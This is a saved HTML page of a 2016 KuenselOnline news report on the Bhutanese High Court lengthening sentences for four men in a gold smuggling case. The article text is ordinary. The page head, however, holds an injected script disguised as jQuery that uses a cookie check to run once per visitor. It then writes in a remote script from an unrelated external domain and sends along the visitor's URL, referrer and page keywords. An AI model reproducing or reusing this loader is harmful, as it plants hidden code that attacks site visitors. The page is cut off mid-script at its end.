<!DOCTYPE html>
<html lang="en-US" prefix="og: http://ogp.me/ns#">
<head>
<meta charset="UTF-8" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://www.kuenselonline.com/xmlrpc.php" />
<title>HC dishes out heavy prison terms in gold smuggling case &#8211; KuenselOnline</title>
<meta property="og:title" content="HC dishes out heavy prison terms in gold smuggling case"/>
<meta property="og:type" content="article"/>
<meta property="og:description" content="Legal: Four men involved in a gold smuggling case last year were handed down longer sentences by the..."/>
<meta property="og:url" content="http://www.kuenselonline.com/hc-dishes-out-heavy-prison-terms-in-gold-smuggling-case/"/>
<meta property="og:site_name" content="KuenselOnline"/>
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="KuenselOnline &raquo; Feed" href="http://www.kuenselonline.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="KuenselOnline &raquo; Comments Feed" href="http://www.kuenselonline.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="KuenselOnline &raquo; HC dishes out heavy prison terms in gold smuggling case Comments Feed" href="http://www.kuenselonline.com/hc-dishes-out-heavy-prison-terms-in-gold-smuggling-case/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.kuenselonline.com\/wp-includes\/js\/wp-emoji-release.min.js"}};
			!function(a,b,c){function d(a){var c,d,e,f,g,h=b.createElement("canvas"),i=h.getContext&&h.getContext("2d"),j=String.fromCharCode;if(!i||!i.fillText)return!1;switch(i.textBaseline="top",i.font="600 32px Arial",a){case"flag":return i.fillText(j(55356,56806,55356,56826),0,0),!(h.toDataURL().length<3e3)&&(i.clearRect(0,0,h.width,h.height),i.fillText(j(55356,57331,65039,8205,55356,57096),0,0),c=h.toDataURL(),i.clearRect(0,0,h.width,h.height),i.fillText(j(55356,57331,55356,57096),0,0),d=h.toDataURL(),c!==d);case"diversity":return i.fillText(j(55356,57221),0,0),e=i.getImageData(16,16,1,1).data,f=e[0]+","+e[1]+","+e[2]+","+e[3],i.fillText(j(55356,57221,55356,57343),0,0),e=i.getImageData(16,16,1,1).data,g=e[0]+","+e[1]+","+e[2]+","+e[3],f!==g;case"simple":return i.fillText(j(55357,56835),0,0),0!==i.getImageData(16,16,1,1).data[0];case"unicode8":return i.fillText(j(55356,57135),0,0),0!==i.getImageData(16,16,1,1).data[0];case"unicode9":return i.fillText(j(55358,56631),0,0),0!==i.getImageData(16,16,1,1).data[0]}return!1}function e(a){var c=b.createElement("script");c.src=a,c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i;for(i=Array("simple","flag","unicode8","diversity","unicode9"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='bbpressmoderationstyle-css'  href='http://www.kuenselonline.com/wp-content/plugins/bbpressmoderation/style.css' type='text/css' media='all' />
<link rel='stylesheet' id='contact-form-7-css'  href='http://www.kuenselonline.com/wp-content/plugins/contact-form-7/includes/css/styles.css' type='text/css' media='all' />
<link rel='stylesheet' id='sb-tab-widget-style-css'  href='http://www.kuenselonline.com/wp-content/plugins/sb-tab-widget/css/sb-tab-widget-style.min.css' type='text/css' media='all' />
<link rel='stylesheet' id='wp-polls-css'  href='http://www.kuenselonline.com/wp-content/plugins/wp-polls/polls-css.css' type='text/css' media='all' />
<style id='wp-polls-inline-css' type='text/css'>
.wp-polls .pollbar {
	margin: 1px;
	font-size: 6px;
	line-height: 8px;
	height: 8px;
	background-image: url('http://www.kuenselonline.com/wp-content/plugins/wp-polls/images/default/pollbg.gif');
	border: 1px solid #c8c8c8;
}

</style>
<link rel='stylesheet' id='tie-style-css'  href='http://www.kuenselonline.com/wp-content/themes/sahifa/style.css' type='text/css' media='all' />
<link rel='stylesheet' id='tie-bbpress-css'  href='http://www.kuenselonline.com/wp-content/themes/sahifa/css/bbpress.css' type='text/css' media='all' />
<link rel='stylesheet' id='tie-ilightbox-skin-css'  href='http://www.kuenselonline.com/wp-content/themes/sahifa/css/ilightbox/dark-skin/skin.css' type='text/css' media='all' />
<link rel='stylesheet' id='Droid+Sans-css'  href='http://fonts.googleapis.com/css?family=Droid+Sans%3Aregular%2C700' type='text/css' media='all' />
<link rel='stylesheet' id='otw-shortcode-general_foundicons-css'  href='http://www.kuenselonline.com/wp-content/plugins/tabs-shortcode-and-widget//include/otw_components/otw_shortcode/css/general_foundicons.css' type='text/css' media='all' />
<link rel='stylesheet' id='otw-shortcode-social_foundicons-css'  href='http://www.kuenselonline.com/wp-content/plugins/tabs-shortcode-and-widget//include/otw_components/otw_shortcode/css/social_foundicons.css' type='text/css' media='all' />
<link rel='stylesheet' id='otw-shortcode-jquery-ui-css'  href='http://www.kuenselonline.com/wp-content/plugins/tabs-shortcode-and-widget//include/otw_components/otw_shortcode/css/jquery-ui-1.9.1.css' type='text/css' media='all' />
<link rel='stylesheet' id='otw-shortcode-css'  href='http://www.kuenselonline.com/wp-content/plugins/tabs-shortcode-and-widget//include/otw_components/otw_shortcode/css/otw_shortcode.css' type='text/css' media='all' />
<script type='text/javascript' src='http://www.kuenselonline.com/wp-includes/js/jquery/jquery.js'></script>
<script type='text/javascript' src='http://www.kuenselonline.com/wp-includes/js/jquery/jquery-migrate.min.js'></script>
<script type='text/javascript' src='http://www.kuenselonline.com/wp-content/plugins/tabs-shortcode-and-widget//include/otw_components/otw_shortcode/js/otw_shortcode_core.js'></script>
<script type='text/javascript' src='http://www.kuenselonline.com/wp-content/plugins/tabs-shortcode-and-widget//include/otw_components/otw_shortcode/js/otw_shortcode.js'></script>
<link rel='https://api.w.org/' href='http://www.kuenselonline.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.kuenselonline.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.kuenselonline.com/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='Fire engine injures  five  in Paro' href='http://www.kuenselonline.com/fire-engine-injures-five-in-paro/' />
<meta name="generator" content="WordPress 4.6.1" />
<link rel="canonical" href="http://www.kuenselonline.com/hc-dishes-out-heavy-prison-terms-in-gold-smuggling-case/" />
<link rel='shortlink' href='http://www.kuenselonline.com/?p=156022' />
<link rel="alternate" type="application/json+oembed" href="http://www.kuenselonline.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.kuenselonline.com%2Fhc-dishes-out-heavy-prison-terms-in-gold-smuggling-case%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://www.kuenselonline.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.kuenselonline.com%2Fhc-dishes-out-heavy-prison-terms-in-gold-smuggling-case%2F&#038;format=xml" />
<meta name="generator" content="Custom Login v3.2.5" />
	<script>
		var lightbox_transition = 'elastic';
		var lightbox_speed = 800;
		var lightbox_fadeOut = 300;
		var lightbox_title = false;
		var lightbox_scalePhotos = true;
		var lightbox_scrolling = false;
		var lightbox_opacity = 0.201;
		var lightbox_open = false;
		var lightbox_returnFocus = true;
		var lightbox_trapFocus = true;
		var lightbox_fastIframe = true;
		var lightbox_preloading = true;
		var lightbox_overlayClose = true;
		var lightbox_escKey = false;
		var lightbox_arrowKey = false;
		var lightbox_loop = true;
		var lightbox_closeButton = true;
		var lightbox_previous = "previous";
		var lightbox_next = "next";
		var lightbox_close = "close";
		var lightbox_html = false;
		var lightbox_photo = false;
		var lightbox_width = '';
		var lightbox_height = '';
		var lightbox_innerWidth = 'false';
		var lightbox_innerHeight = 'false';
		var lightbox_initialWidth = '300';
		var lightbox_initialHeight = '100';

		var maxwidth = jQuery(window).width();

		if (maxwidth >768) {
			maxwidth =768;
		}

		var lightbox_maxWidth = 768;
		var lightbox_maxHeight = 500;

		var lightbox_slideshow = false;
		var lightbox_slideshowSpeed = 2500;
		var lightbox_slideshowAuto = true;
		var lightbox_slideshowStart = "start slideshow";
		var lightbox_slideshowStop = "stop slideshow";
		var lightbox_fixed = true;
		var lightbox_top, lightbox_bottom, lightbox_left, lightbox_right;

				lightbox_top = false;
		lightbox_bottom = false;
		lightbox_left = false;
		lightbox_right = false;
		
		var lightbox_reposition = false;
		var lightbox_retinaImage = true;
		var lightbox_retinaUrl = false;
		var lightbox_retinaSuffix = "@2x.$1";
		jQuery(window).load(function() {
			var title;
			jQuery('a.cboxElement').click(function() {
				title = jQuery(this).find('img').attr('alt') && lightbox_title ? jQuery(this).find('img').attr('alt') : '';
				setTimeout(function() {
					jQuery('#cboxContent #cboxTitle').text(title);
				}, 1000);
			});
			jQuery('#cboxNext,#cboxPrevious').click(function() {
				setTimeout(function() {
					var src = jQuery('img.cboxPhoto').attr('src');
					jQuery('a.cboxElement').each(function() {
						if (jQuery(this).attr('href') === src) {
							title = lightbox_title ? jQuery(this).find('img').attr('alt') : '';
							jQuery('#cboxContent #cboxTitle').text(title);
						}
					});
				}, 1000);
			});
			jQuery('body').on('click', '#cboxLoadedContent img', function() {
				setTimeout(function() {
					var src = jQuery('img.cboxPhoto').attr('src');
					jQuery('a.cboxElement').each(function() {
						if (jQuery(this).attr('href') === src) {
							title = lightbox_title ? jQuery(this).find('img').attr('alt') : '';
							jQuery('#cboxContent #cboxTitle').text(title);
						}
					});
				}, 1000);
			});
		});
	</script>
	
 <!-- OneAll.com / Social Login for WordPress / v5.2 -->
<script data-cfasync="false" type="text/javascript">
 (function() {
  var oa = document.createElement('script'); oa.type = 'text/javascript';
  oa.async = true; oa.src = 'http://kuensel.api.oneall.com/socialize/library.js';
  var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(oa, s);
 })();
</script>
<link rel="shortcut icon" href="http://www.kuenselonline.com/2015dev3/wp-content/uploads/favicon.ico" title="Favicon" />	
<!--[if IE]>
<script type="text/javascript">jQuery(document).ready(function (){ jQuery(".menu-item").has("ul").children("a").attr("aria-haspopup", "true");});</script>
<![endif]-->	
<!--[if lt IE 9]>
<script src="http://www.kuenselonline.com/wp-content/themes/sahifa/js/html5.js"></script>
<script src="http://www.kuenselonline.com/wp-content/themes/sahifa/js/selectivizr-min.js"></script>
<![endif]-->
<!--[if IE 9]>
<link rel="stylesheet" type="text/css" media="all" href="http://www.kuenselonline.com/wp-content/themes/sahifa/css/ie9.css" />
<![endif]-->
<!--[if IE 8]>
<link rel="stylesheet" type="text/css" media="all" href="http://www.kuenselonline.com/wp-content/themes/sahifa/css/ie8.css" />
<![endif]-->
<!--[if IE 7]>
<link rel="stylesheet" type="text/css" media="all" href="http://www.kuenselonline.com/wp-content/themes/sahifa/css/ie7.css" />
<![endif]-->


<meta name="viewport" content="width=device-width, initial-scale=1.0" />



<style type="text/css" media="screen">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</style> 


<!-- BEGIN Typekit Fonts for WordPress -->

<!-- END Typekit Fonts for WordPress -->




















<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://amarracaodecargas.com.br/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'J18171' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
</head>
<body id="top" class="single single-post postid-156022 single-format-standard lazy-enabled">
<div class="wrapper-outer">
	<div class="background-cover"></div>
	<aside id="slide-out">
	
			<div class="search-mobile">
			<form method="get" id="searchform-mobile" action="http://www.kuenselonline.com/">
				<button class="search-button" type="submit" value="Search"><i class="fa fa-search"></i></button>	
				<input type="text" id="s-mobile" name="s" value="Search" onfocus="if (this.value == 'Search') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Search';}"  />
			</form>
		</div><!-- .search-mobile /-->
		
		
		<div id="mobile-menu" ></div>
	</aside><!-- #slide-out /-->
		<div id="wrapper" class="wide-layout">
		<div class="inner-wrapper">
		
		<header id="theme-header" class="theme-header">
						<div class="top-nav">
				<div class="container">
							<span class="today-date">Wednesday , November 23 2016</span>					
										<div class="search-block">
						<form method="get" id="searchform-header" action="http://www.kuenselonline.com/">
							<button class="search-button" type="submit" value="Search"><i class="fa fa-search"></i></button>	
							<input class="search-live" type="text" id="s-header" name="s" value="Search" onfocus="if (this.value == 'Search') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Search';}"  />
						</form>
					</div><!-- .search-block /-->
			<div class="social-icons">
		<a class="ttip-none" title="Rss" href="http://www.kuenselonline.com/feed/" target="_blank"><i class="fa fa-rss"></i></a>		
			</div>

		
					</div><!-- .container /-->
			</div><!-- .top-menu /-->
					<div class="header-content">
		
					<a id="slide-out-open" class="slide-out-open" href="#"><span></span></a>
				
			<div class="logo">
			<h2>								<a title="KuenselOnline" href="http://www.kuenselonline.com/">
					<img src="http://www.kuenselonline.com/wp-content/uploads/kuensel_big_logo5.png" alt="KuenselOnline"  /><strong>KuenselOnline Bhutan&#039;s Daily Newspaper</strong>
				</a>
			</h2>			</div><!-- .logo /-->
			
 <hgroup id="secondary">
<ul class="logininfo"><li><a href="/wp-login.php">Log in</a></li> <li style="color:#fff;padding-right:2px;">|</li><li><a href="/wp-login.php?action=register">Register</a></li> <li style="color:#fff;padding-right:2px;">|</li><li><a href="http://ekuensel.com" target="_blank">Subscribe</a></li>  <li style="color:#fff;padding-right:2px;">|</li>
<li><a href="#" alt="English" ><img src="http://www.kuenselonline.com/wp-content/themes/s3kuensel/images/flags/gb.png"/></a></li> <li style="color:#fff;padding-right:2px;">|</li><li><a href="http://www.dzkuensel.bt" alt="Dzongkha" target="_blank"><img src="http://www.kuenselonline.com/wp-content/themes/s3kuensel/images/flags/ad.alt.png"/></a></li> </ul>
</hgroup>
			<div class="clear"></div>
			
		</div>	
													<nav id="main-nav" class="fixed-enabled">
				<div class="container">
				
									<div class="main-menu"><ul id="menu-main-menu" class="menu"><li id="menu-item-42149" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-42149"><a href="http://www.kuenselonline.com/">Home</a></li>
<li id="menu-item-143401" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-143401"><a href="http://www.kuenselonline.com/category/news/">News</a></li>
<li id="menu-item-153719" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-153719"><a href="http://www.kuenselonline.com/category/lgelections/">LG Election 2016</a></li>
<li id="menu-item-42140" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-42140"><a href="http://www.kuenselonline.com/category/editorial/">Editorial</a></li>
<li id="menu-item-42141" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-42141"><a href="http://www.kuenselonline.com/category/featured/">Features</a></li>
<li id="menu-item-122449" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-122449"><a href="http://www.kuenselonline.com/category/k2/">K2</a></li>
<li id="menu-item-40580" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-40580"><a href="http://www.kuenselonline.com/category/opinions/">Opinions</a></li>
<li id="menu-item-40581" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-40581"><a href="http://www.kuenselonline.com/category/sports/">Sports</a></li>
<li id="menu-item-125231" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-125231"><a href="http://www.kuenselonline.com/category/focus-point/">Focus Point</a></li>
<li id="menu-item-42137" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-42137"><a href="http://www.kuenselonline.com/forums/forum/from-the-readers/">Forum</a></li>
<li id="menu-item-42152" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-42152"><a href="http://www.kuenselonline.com/videos/">Video</a></li>
</ul></div>														</div>
			</nav><!-- .main-nav /-->
					</header><!-- #header /-->


		
                          <div class="e3lan e3lan-top" style="text-align: center;float: none;">			
			<a href="http://www.zhiwaling.com" title="" >
				<img src="http://www.kuenselonline.com/wp-content/uploads/zhiwaling22.jpg" alt="" />
			</a>
				</div>	<div id="main-content" class="container">
			
		
	
	
		
	<div class="content">
	
				
		<div xmlns:v="http://rdf.data-vocabulary.org/#"  id="crumbs"><span typeof="v:Breadcrumb"><a rel="v:url" property="v:title" class="crumbs-home" href="http://www.kuenselonline.com">Home</a></span> <span class="delimiter">/</span> <span typeof="v:Breadcrumb"><a rel="v:url" property="v:title" href="http://www.kuenselonline.com/category/news/">News</a></span> <span class="delimiter">/</span> <span class="current">HC dishes out heavy prison terms in gold smuggling case</span></div>
					
				
						
		<article class="post-listing post-156022 post type-post status-publish format-standard hentry category-news" id="the-post">
						
			<div class="single-post-thumb">
			<div class="ccfic"></div>		
		</div>
			
		<div class="single-post-caption"><span style="color: #ff0000;"><strong>Legal:</strong></span> Four men involved in a gold smuggling case last year were handed down longer sentences by the High Court which revoked the Chukha dzongkhag court’s decisions on November 16.</div> 
		

			<div class="post-inner">
			
							<h1 class="name post-title entry-title" itemprop="itemReviewed" itemscope itemtype="http://schema.org/Thing"><span itemprop="name">HC dishes out heavy prison terms in gold smuggling case</span></h1>

						
<p class="post-meta">
	
		
	<span class="tie-date"><i class="fa fa-clock-o"></i>November 22, 2016</span>	
	<span class="post-cats"><i class="fa fa-folder"></i><a href="http://www.kuenselonline.com/category/news/" rel="category tag">News</a></span>
	
	<span class="post-comments"><i class="fa fa-comments"></i><a href="http://www.kuenselonline.com/hc-dishes-out-heavy-prison-terms-in-gold-smuggling-case/#respond">Leave a comment</a></span>
<span class="post-views"><i class="fa fa-eye"></i>2,086 Views</span> </p>
<div class="clear"></div>
			
				<div class="entry">
					
					
					<p><span style="color: #ff0000;"><strong>Legal:</strong></span> Four men involved in a gold smuggling case last year were handed down longer sentences by the High Court which revoked the Chukha dzongkhag court’s decisions on November 16.</p>
<p>The four were sentenced to prison terms ranging from two years to nine years and the gold was surrendered to the government.</p>
<p>Chungdu Wangchuk received a prison term of nine years and six months, Rinchen Dorji got seven years and six months, and Kuenley Tshering got two years, two months and eight days.</p>
<p>The man who delivered the gold package from a man at the China border to Haa, Rinzin, was sentenced to two and half years.</p>
<p>The men appealed to the High Court along with Office of the Attorney General (OAG) which charged them with smuggling, criminal conspiracy, obstruction of lawful authority, hindrance of prosecution and failure to report a crime.</p>
<p>The Chukha dzongkhag court handed a non-compoundable prison term of two years and six months each to the defendants Chungdu Wangchuk, 51, and Rinchen Dorji, 50, for receiving smuggled gold biscuits and attempting to transport it to Phuentsholing and for criminal conspiracy.</p>
<p>Overturning the decision of the lower court, the High Court nullified the internal agreement signed between Chungdu Wangchuk, Rinchen Dorji, and Kuenley Tshering in October 2015. According to the contract, they agreed to be carriers of gold from the border to Phuentsholing and requested Rinzin to bring the gold from the border to Haa.</p>
<p>The High Court quoted section 27 of the Contract Act of Bhutan 2013. The Act states: “If the consideration or object of any agreement is not lawful, the agreement shall be void”.</p>
<p>Further section 17 of the Act states that an agreement, which is not enforceable by law shall be void.</p>
<p>Rinzin, who was carrying yak fodder to his herd near the Chinese border on November 11, 2015 collected a package at the request of Chungdu Tshering. Four days later, he handed it to Rinchen Dorji at Haa, who then delivered it to Chundu Wangchuk, who opened the package containing seven gold biscuits, weighing a kilogramme each, at Chuzom.</p>
<p>Chundu Wangchuk was supposed to take the gold from Chuzom to Phuentsholing. However, he was arrested around midnight of November 15 after someone tipped off the police.</p>
<p>The OAG argued that the Chukha dzongkhag court altered the charges on the smuggling of seven kilogrammes of gold to “receivers” and “carriers” of smuggled goods against the four men.</p>
<p>Reversing the lower court’s decision, the High Court found Chungdu Wangchuk and Rinchen Dorji guilty of smuggling gold worth more than Nu 18.6 million. It ruled that the amount of gold smuggled in was beyond the 50 gramme permissible limit.</p>
<p>The High Court verdict stated that the statements from the three accused, Chungdu Wangchuk, Rinchen Dorji, and Kuenley Tshering, indicated beyond reasonable doubt the fact that their acts and intention were to transport gold from China to India.</p>
<p>The High Court’s value-based non-compoundable sentence to Chungdu Wangchuk and Rinchen Dorji were prison terms of five years each.</p>
<p>Chungdu Wangchuk was in police custody for four months and 20 days, and Rinchen Dorji served four months and 16 days in detention. This reduced their sentences to four years, seven months and 10 days for Chungdu Wangchuk and four years seven months and 14 days for Rinchen Dorji.</p>
<p>The court also found them guilty of criminal conspiracy for forging the contract with the intention to smuggle gold to India. Section 27 of the Penal Code states: “A defendant shall be guilty of the offence of criminal conspiracy to commit a crime, if the defendant agrees with another person or persons that they or one or more of them will engage in a conduct that constitutes a crime”.</p>
<p>Chungdu Wangchuk and Rinchen Dorji were issued two and a half year sentences each for this criminal offence. Kuenley Tshering received half the sentence, which allows the three men to pay in lieu of imprisonment terms. As he was detained in police custody for three months and 21 days, he has to serve two years, two months and eight days in prison.</p>
<p>The Tsimasham police had barricaded the road with a security checkpoint about 100 metres away from Tsimasham town towards Thimphu. The police stopped the vehicle with Chungdu Wangchuk and two accomplices in it at around 11pm and asked them to hand over the vehicle’s key. However, they did not comply and snuck through the blockade. Police chased them, and arrested them at the road point that leads to Tashigatshel from the main highway.</p>
<p>Chungdu Wangchuk is sentenced to a year in prison for obstruction of lawful authority. The Penal Code’s section 423 states: “A defendant shall be guilty of obstruction of lawful authority, if the defendant knowingly and without any reasonable cause obstructs lawful authority in execution of lawful duties”.</p>
<p>By the time the three were caught, the gold had been tossed out of the car. Chungdu Wangchuk threw away the seven kilogrammes and a mobile phone into the forest for which he was charged for hindering prosecution and sentenced to one year in prison.</p>
<p>The Penal Code section 418 (E) states that: ‘A defendant shall be guilty of the offence of hindering prosecution, if the defendant conceals or destroys any evidence that might aid in discovery or apprehension of the person’.</p>
<p>Rinzin was sentenced to two years six months, half the prison terms given to Chungdu Wangchuk and Rinchen Dorji for smuggling. As he was detained for four months and one night, and the sentence being non-compoundable, he will have to serve the remaining prison term of 25 months and 29 days in prison.</p>
<p>The parties have 10 working days from the date of the judgment to appeal or file for bail.</p>
<p><b>Tshering Palden</b></p>
										
									</div><!-- .entry /-->
								<span style="display:none" class="updated">2016-11-22</span>
								<div style="display:none" class="vcard author" itemprop="author" itemscope itemtype="http://schema.org/Person"><strong class="fn" itemprop="name"><a href="http://www.kuenselonline.com/author/kuensel1/" title="Posts by kuensel1" rel="author">kuensel1</a></strong></div>
								
				<div class="share-post">
	<span class="share-text">Share</span>
	
		<ul class="flat-social">	
			<li><a href="http://www.facebook.com/sharer.php?u=http://www.kuenselonline.com/hc-dishes-out-heavy-prison-terms-in-gold-smuggling-case/" class="social-facebook" rel="external" target="_blank"><i class="fa fa-facebook"></i> <span>Facebook</span></a></li>
		
			<li><a href="http://twitter.com/home?status=HC dishes out heavy prison terms in gold smuggling case http://www.kuenselonline.com/hc-dishes-out-heavy-prison-terms-in-gold-smuggling-case/ " class="social-twitter" rel="external" target="_blank"><i class="fa fa-twitter"></i> <span>Twitter</span></a></li>
				<li><a href="https://plusone.google.com/_/+1/confirm?hl=en&amp;url=http://www.kuenselonline.com/hc-dishes-out-heavy-prison-terms-in-gold-smuggling-case/&amp;name=HC dishes out heavy prison terms in gold smuggling case" class="social-google-plus" rel="external" target="_blank"><i class="fa fa-google-plus"></i> <span>Google +</span></a></li>
					<li><a href="http://www.linkedin.com/shareArticle?mini=true&url=http://www.kuenselonline.com/hc-dishes-out-heavy-prison-terms-in-gold-smuggling-case/&title=HC dishes out heavy prison terms in gold smuggling case" class="social-linkedin" rel="external" target="_blank"><i class="fa fa-linkedin"></i> <span>LinkedIn</span></a></li>
			</ul>
		<div class="clear"></div>
</div> <!-- .share-post -->




				<div class="clear"></div>
			</div><!-- .post-inner -->
		</article><!-- .post-listing -->
		
		
				
				
		
						
		<div class="post-navigation">
			<div class="post-previous"><a href="http://www.kuenselonline.com/fire-engine-injures-five-in-paro/" rel="prev"><span>Previous</span> Fire engine injures  five  in Paro</a></div>
			<div class="post-next"></div>
		</div><!-- .post-navigation -->
			
			<section id="related_posts">
		<div class="block-head">
			<h3>Related Articles</h3><div class="stripe-line"></div>
		</div>
		<div class="post-listing">
						<div class="related-item">
							
				<h3><a href="http://www.kuenselonline.com/fire-engine-injures-five-in-paro/" rel="bookmark">Fire engine injures  five  in Paro</a></h3>
				<p class="post-meta"><span class="tie-date"><i class="fa fa-clock-o"></i>November 22, 2016</span></p>
			</div>
						<div class="related-item">
							
				<div class="post-thumbnail">
					<a href="http://www.kuenselonline.com/getting-priorities-right-for-continued-support/">
						<img width="310" height="165" src="http://www.kuenselonline.com/wp-content/uploads/2016/11/IMG_6416-310x165.jpg" class="attachment-tie-medium size-tie-medium wp-post-image" alt="img_6416" /><div class="ccfic"><span class="ccfic-text">Participants discuss emerging national priorities </span></div>						<span class="fa overlay-icon"></span>
					</a>
				</div><!-- post-thumbnail /-->
							
				<h3><a href="http://www.kuenselonline.com/getting-priorities-right-for-continued-support/" rel="bookmark">Getting priorities right for continued support</a></h3>
				<p class="post-meta"><span class="tie-date"><i class="fa fa-clock-o"></i>November 22, 2016</span></p>
			</div>
						<div class="related-item">
							
				<h3><a href="http://www.kuenselonline.com/court-unmoved-by-arguments-in-jplp-tax-evasion-case/" rel="bookmark">Court unmoved by arguments in JPLP tax-evasion case</a></h3>
				<p class="post-meta"><span class="tie-date"><i class="fa fa-clock-o"></i>November 22, 2016</span></p>
			</div>
						<div class="clear"></div>
		</div>
	</section>
			
			
	<section id="check-also-box" class="post-listing check-also-right">
		<a href="#" id="check-also-close"><i class="fa fa-close"></i></a>

		<div class="block-head">
			<h3>Check Also</h3>
		</div>

				<div class="check-also-post">
						
			<div class="post-thumbnail">
				<a href="http://www.kuenselonline.com/duenmang-tshachu-gets-facelift/">
					<img width="310" height="165" src="http://www.kuenselonline.com/wp-content/uploads/2016/11/IMG_5460-310x165.jpg" class="attachment-tie-medium size-tie-medium wp-post-image" alt="img_5460" /><div class="ccfic"><span class="ccfic-text">The new guesthouse and camp sites will accommodate the increasing number of visitors</span></div>					<span class="fa overlay-icon"></span>
				</a>
			</div><!-- post-thumbnail /-->
						
			<h2 class="post-title"><a href="http://www.kuenselonline.com/duenmang-tshachu-gets-facelift/" rel="bookmark">Duenmang tshachu gets facelift</a></h2>
			<p><span style="color: #ff0000;"><b>Facilities: </b></span>Those visiting the Duenmang tshachu (hot spring) under Nangkor gewog in Zhemgang need not risk falling boulders on the way there anymore.</p>
		</div>
			</section>
			
			
				
		
				
<div id="comments">


<div class="clear"></div>
				<div id="respond" class="comment-respond">
			<h3 id="reply-title" class="comment-reply-title">Leave a Reply <small><a rel="nofollow" id="cancel-comment-reply-link" href="/hc-dishes-out-heavy-prison-terms-in-gold-smuggling-case/#respond" style="display:none;">Cancel reply</a></small></h3><p class="must-log-in">You must be <a href="http://www.kuenselonline.com/wp-login.php?redirect_to=http%3A%2F%2Fwww.kuenselonline.com%2Fhc-dishes-out-heavy-prison-terms-in-gold-smuggling-case%2F">logged in</a> to post a comment.</p>		</div><!-- #respond -->
		

</div><!-- #comments -->
		
	</div><!-- .content -->
<aside id="sidebar">
	<div class="theiaStickySidebar">
<div id="text-html-widget-3" class="widget text-html"><div class="widget-top"><h4>Picture Story</h4><div class="stripe-line"></div></div>
						<div class="widget-container"><div >
	<style>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</style>


	<script>
    var pausehover="on";
	var huge_video_playing={};
	var autoplayMatch={};
    var scrolling;
    var ifhasthumb ="dotstop";

    scrolling = pausehover != 'on';

    jQuery(window).load(function(){
        if(!/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent))
        setTimeout(function(){
            jQuery('.huge_it_slide_container_2').mouseleave();
        }, 10);
    });
</script>


<!--  #######ADD YOUTUBE IFRAME TWICE######## -->
<script>
			
	var YTdeferred = jQuery.Deferred();
	window.onYouTubeIframeAPIReady = function() {
		//resolve when youtube callback is called passing YT as a parameter
		YTdeferred.resolve(window.YT);

	};
	YTdeferred.done(function(YT) {

